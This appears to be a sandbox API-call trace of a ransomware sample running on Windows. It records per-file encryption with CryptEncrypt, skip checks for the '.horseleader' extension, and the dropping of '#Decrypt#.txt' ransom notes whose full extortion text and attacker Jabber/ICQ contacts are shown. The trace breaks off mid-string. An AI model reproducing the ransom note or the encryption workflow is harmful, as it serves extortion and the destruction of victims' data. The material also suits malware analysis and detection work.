(lpString1="ipsptg.xml", lpString2="_uninstalling_.png") returned 1 [0234.181] lstrlenW (lpString=".testttjffg") returned 11 [0234.181] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", lpSrch=".testttjffg") returned 0x0 [0234.181] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.181] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.181] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.181] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d7a859, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d7a859, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa54, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipsrom.xml", cAlternateFileName="")) returned 1 [0234.181] lstrcmpiW (lpString1="ipsrom.xml", lpString2="Windows") returned -1 [0234.181] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml") returned 65 [0234.181] StrStrIW (lpFirst="ipsrom.xml", lpSrch=".horseleader") returned 0x0 [0234.181] lstrcmpW (lpString1="ipsrom.xml", lpString2="#Decrypt#.txt") returned 1 [0234.181] lstrcmpW (lpString1="ipsrom.xml", lpString2="_uninstalling_.png") returned 1 [0234.181] lstrlenW 
(lpString=".testttjffg") returned 11 [0234.181] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", lpSrch=".testttjffg") returned 0x0 [0234.182] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.182] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.182] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.182] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27da09b6, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27da09b6, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9ee, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipsrus.xml", cAlternateFileName="")) returned 1 [0234.182] lstrcmpiW (lpString1="ipsrus.xml", lpString2="Windows") returned -1 [0234.182] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml") returned 65 [0234.182] StrStrIW (lpFirst="ipsrus.xml", lpSrch=".horseleader") returned 0x0 [0234.182] lstrcmpW (lpString1="ipsrus.xml", lpString2="#Decrypt#.txt") returned 1 [0234.182] lstrcmpW (lpString1="ipsrus.xml", lpString2="_uninstalling_.png") returned 1 [0234.182] lstrlenW (lpString=".testttjffg") returned 11 [0234.182] StrStrW (lpFirst="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", lpSrch=".testttjffg") returned 0x0 [0234.182] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.182] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.182] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.183] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27da09b6, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27da09b6, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa08, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipssrb.xml", cAlternateFileName="")) returned 1 [0234.183] lstrcmpiW (lpString1="ipssrb.xml", lpString2="Windows") returned -1 [0234.183] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml") returned 65 [0234.183] StrStrIW (lpFirst="ipssrb.xml", lpSrch=".horseleader") returned 0x0 [0234.183] lstrcmpW (lpString1="ipssrb.xml", lpString2="#Decrypt#.txt") returned 1 [0234.183] lstrcmpW (lpString1="ipssrb.xml", lpString2="_uninstalling_.png") returned 1 [0234.184] lstrlenW (lpString=".testttjffg") returned 11 [0234.184] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", lpSrch=".testttjffg") returned 
0x0 [0234.184] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.184] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.184] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.184] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27dc6b13, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27dc6b13, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa24, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipssrl.xml", cAlternateFileName="")) returned 1 [0234.184] lstrcmpiW (lpString1="ipssrl.xml", lpString2="Windows") returned -1 [0234.184] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml") returned 65 [0234.184] StrStrIW (lpFirst="ipssrl.xml", lpSrch=".horseleader") returned 0x0 [0234.184] lstrcmpW (lpString1="ipssrl.xml", lpString2="#Decrypt#.txt") returned 1 [0234.184] lstrcmpW (lpString1="ipssrl.xml", lpString2="_uninstalling_.png") returned 1 [0234.184] lstrlenW (lpString=".testttjffg") returned 11 [0234.184] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml", lpSrch=".testttjffg") returned 0x0 [0234.184] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | 
out: pbBuffer=0x32aed10) returned 1 [0234.184] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.184] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.184] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27decc70, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27decc70, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9d8, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ipssve.xml", cAlternateFileName="")) returned 1 [0234.185] lstrcmpiW (lpString1="ipssve.xml", lpString2="Windows") returned -1 [0234.185] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml") returned 65 [0234.185] StrStrIW (lpFirst="ipssve.xml", lpSrch=".horseleader") returned 0x0 [0234.185] lstrcmpW (lpString1="ipssve.xml", lpString2="#Decrypt#.txt") returned 1 [0234.185] lstrcmpW (lpString1="ipssve.xml", lpString2="_uninstalling_.png") returned 1 [0234.185] lstrlenW (lpString=".testttjffg") returned 11 [0234.185] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", lpSrch=".testttjffg") returned 0x0 [0234.185] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.185] CryptEncrypt (in: hKey=0x7c65a0, 
hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.185] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.185] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="it-IT", cAlternateFileName="")) returned 1 [0234.185] lstrcmpiW (lpString1="it-IT", lpString2="Windows") returned -1 [0234.185] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT") returned 60 [0234.185] lstrcmpW (lpString1="it-IT", lpString2=".") returned 1 [0234.185] lstrcmpW (lpString1="it-IT", lpString2="..") returned 1 [0234.185] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.185] GetProcessHeap () returned 0x780000 [0234.185] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.185] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\*") returned 62 [0234.185] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\ink\\it-IT\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.186] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.186] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\.") returned 62 [0234.186] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.186] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.186] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.186] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\..") returned 63 [0234.186] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.186] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.186] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9e26c68, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xea015e21, 
ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xea015e21, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.186] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.186] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui") returned 76 [0234.186] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.186] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.186] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.186] lstrlenW (lpString=".testttjffg") returned 11 [0234.186] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.186] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.186] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.187] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.187] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9e26c68, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xea015e21, 
ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xea015e21, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.187] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.187] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\#Decrypt#.txt") returned 74 [0234.187] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.188] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0234.188] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.189] lstrlenA (lpString="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") returned 1368 [0234.189] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.189] CloseHandle (hObject=0x158) returned 1 [0234.189] GetProcessHeap () returned 0x780000 [0234.189] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.189] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0234.189] lstrcmpiW (lpString1="ja-JP", lpString2="Windows") returned -1 [0234.190] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP") returned 60 [0234.190] lstrcmpW (lpString1="ja-JP", lpString2=".") returned 1 [0234.190] lstrcmpW (lpString1="ja-JP", lpString2="..") returned 1 [0234.190] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.190] GetProcessHeap () returned 0x780000 [0234.190] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7db828 [0234.190] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\*") returned 62 [0234.190] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.191] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.191] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\.") returned 62 [0234.191] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.191] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.191] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.191] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\..") returned 63 [0234.191] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.191] lstrcmpW (lpString1="..", lpString2="..") returned 
0 [0234.191] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe68981a0, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe6aad4b6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe6aad4b6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.191] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.191] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui") returned 76 [0234.191] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.191] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.191] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.191] lstrlenW (lpString=".testttjffg") returned 11 [0234.191] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.192] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.192] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.192] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.192] 
FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe68981a0, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe6aad4b6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe6aad4b6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.192] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.192] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\#Decrypt#.txt") returned 74 [0234.192] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.193] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ 